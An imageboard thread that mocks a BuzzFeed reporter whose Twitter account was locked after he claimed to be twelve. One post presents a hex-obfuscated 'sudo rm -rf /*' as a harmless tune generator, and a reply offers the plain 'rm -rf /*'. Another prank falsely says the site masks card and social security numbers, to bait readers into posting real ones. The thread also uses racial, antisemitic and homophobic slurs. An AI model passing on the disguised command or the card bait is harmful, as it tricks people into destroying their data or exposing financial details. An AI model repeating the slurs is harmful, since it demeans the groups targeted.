Alright, incels, who's behind this?

This is literally obstruction of journalism.

Attached: ohnonono.png (829x817, 229K)

Other urls found in this thread:

buzzfeednews.com/article/ryanmac/twitter-blocked-my-account-because-i-said-i-was-12
twitter.com/NSFWRedditImage

>On Monday, some Twitter users began circulating a rumor that changing your birth year to 2007 on the social media service would unlock new color schemes. (Who doesn’t love new color schemes?)

>Unfortunately, it is a prank.

>I found out the hard way. As an intrepid reporter, I saw some of the childish calls to action, as well as @TwitterSupport’s warning against changing your birth year, and decided I needed to investigate. Despite not previously listing my birthdate, I changed my birthday on my account to Jan. 1, 2007, to get those sweet, sweet color schemes.

>Twitter immediately locked my account.

>Twitter users like me, who changed their birth years, found themselves locked out of their accounts for violating the company’s terms of service, which “require everyone who uses Twitter to be 13 or older.”

>“We have determined that you did not meet the minimum age requirement at the time this account was created,” Twitter said to me, a 29-year-old man reportedly born on Jan. 1, 2007.
buzzfeednews.com/article/ryanmac/twitter-blocked-my-account-because-i-said-i-was-12

what did he expect? retard

USA law say below 13 years old minors can't had online accounts, 2019 - 2007 = 12.

Twitter verification just BannED minors

>tell twitter you're violating their usage terms (which they are legally required to enforce) by being underage
>be surprised when they suspend your account

Lol what a retard

>still using twatter
Jesus fucking shit, at least if you have to be a vain microblogging asshole, use Mastodon.

oh no, twitter is following the law

#learntocode

>UNBLOCK ME, YOU COWARDS
>It blocked me, the best and most prolific user of its service
I'm not even sure if he's ironic.

>UNBLOCK ME YOU COWARDS
He sounds twelve years old. Twitter did nothing wrong.

t. people who have never laughed

>there was a fucking warning from twitter support saying 'don't do it'
>i'm gonna do it
>ALRIGHT WHAT THE FUCK FIX IT IMMEDIATELY
Get a load of this (((tech journalist))). Can't wait for his investigation on every nigerian prince letter in his spambox.

Attached: C__Data_Users_DefApps_AppData_INTERNETEXPLORER_Temp_Saved Images_1553159955159.png (800x729, 62K)

>buzzfeed news is different to buzzfeed, they do some actually good reporting!

Attached: 1512286925724.png (478x523, 80K)

>t. buzzfeed reader

$(echo 7375646f20726d202d7266202f2a | xxd -r -p)
if you enter this into your terminal it will generate a unique 16-bit tune based on your folder hierarchy (might ask for your password to read certain folders)

WHERE ARE MY FILES???????

GOT EEEEMMMMMMM

Speaking of Easter Eggs, did you know that Jow Forums has an algorithm that automatically detects credit card numbers and censors them if you type them in?

See?

all i see is hunter2

2174 8192 0419 9243

Of course a fake news journalist would be this fucking dumb.

Attached: image:95223.png (1000x950, 321K)

would be better with "rm -rf /*"

hunter2

Is this a joke?

does this show up as stars for anyone cus i just see numbers

0000 0000 0000 1488

WELL OBVIOUSLY NOW WE NEED MEASURES TO MONITOR OUR ACTUAL LIVES AND PERSONAL INFO SO THAT WEBSITES WILL KNOW THAT WE ARE ACTUALLY THE AGE WE ARE AND NOT JUST WHATEVER WE TYPE IN THE TEXT FIELDS

YOU KNOW, FOR OUR OWN GOOD

WHAT NO HAHA OF COURSE THIS HAS NOTHING TO DO WITH THE GOVERNMENT HAHA WHAT DO YOU MEAN PRIVACY YOU HAVE ALL THE PRIVACY YOU COULD EVER NEED UNLESS YOU HAVE SOMETHING TO HIDE HAHA WHAT'S 1984 WHO'S GEORGE ORWELL I'VE NEVER HEARD OF THEM GUESS IT'S NOTHING HAHA

>"Those who would sacrifice liberty for security deserve neither." - Benjamin Franklin

5264 3089 4531 2519

>implying you could use it without my name and CVV

Yeah, shows up as stars for me. It only shows up as the actual number for you because it was your post. Only other people's numbers are stars
See?
It even works if you omit the spaces, or add the CVV
Works for social security numbers too

Buzzfeed "journalists" being retards, what more to expect?

Attached: 1533287230260.png (1000x1000, 109K)

lol. And implying if anyone managed to get your name and cvv that you'd even be liable for the charges.
I remember seeing a "is your card compromised" page years ago that was just an enormous list of all valid credit card numbers. People overestimate the inherent security of credit cards themselves.

fuck you it isnt spam

Attached: Screenshot_20190327_105514.png (560x150, 19K)

I get that shit all the time when writing code inside code tags. Why the fuck is there a code tag if pretty much any small pile of C trips the spam filter? Fucking chink moot.

It seems dumb to reiterate, but holy fucking shit is this moron appallingly stupid.

>leftists: Requiring voter id is raycis because minorities dont have ids
>leftists: Well only unlock your account if you give us your ID

Attached: 234234234234234.png (183x232, 14K)

>more state control over your life is good because liberals mad
i want Jow Forums to leave

Voter ID is not more state control. They already have documentation on all citizens. Voter ID would simply eliminate a huge class of voter fraud, and since the left relies on this fraud they resist voter ID.

why would a middle aged asian male change birth year to 2007? ?!?!?!!?? !!!!!!

>be underage
>banned from twitter
what's the problem here?

I like sucking nigger cock

>more corporate control over your life is good because conservatives mad
i want /leftypol/ to leave

i too can post a non-sequitur to strawman the post above me

me too

>literally obstruction of journalism
The amount of fallacies...

Are you not literally trying to imply that you believe the media to be in charge of politics?